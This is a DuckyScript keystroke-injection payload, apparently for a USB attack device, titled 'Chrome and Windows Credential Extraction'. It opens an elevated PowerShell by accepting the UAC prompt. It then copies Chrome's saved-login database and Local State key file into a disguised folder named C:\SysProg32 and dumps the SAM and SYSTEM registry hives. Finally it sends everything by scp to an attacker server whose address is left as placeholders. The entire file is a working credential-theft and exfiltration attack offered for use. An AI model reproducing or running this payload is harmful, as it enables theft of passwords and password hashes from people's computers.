REM === Payload Title: Chrome and Windows Credential Extraction ===
REM Author: Shad Bin Mohd Rizal
REM Created: 18-10-2025
REM Purpose: To extract chrome password manager login data and Windows username and password hash, then send it to a remote server.
REM Target: Windows environment 
REM Notes:
REM - I already have a public remote server to receive the folder
REM - In this payload I will scp (sftp) to transfer the extracted folder to the destination
REM - You can modify this payload to use other method like upload to google drives, ncat etc.

GUI R
DELAY 400
STRING powershell
DELAY 400
CTRL SHIFT ENTER
DELAY 400
LEFTARROW
DELAY 400
ENTER
DELAY 500
STRING New-Item -ItemType Directory -Path "C:\SysProg32" -Force;Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination "C:\SysProg32" -Force;Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" -Destination "C:\SysProg32" -Force;reg save HKLM\SAM "C:\SysProg32\sam.save" /y;reg save HKLM\SYSTEM "C:\SysProg32\system.save" /y
DELAY 400
ENTER
DELAY 400
STRING scp -P <ssh port> -r "C:\SysProg32\" <username>@<destination server ip>:/<destination directory>
DELAY 400
ENTER
DELAY 400
STRING yes
DELAY 400
ENTER
DELAY 400
STRING <password>
DELAY 400
ENTER
DELAY 800
ALT F4
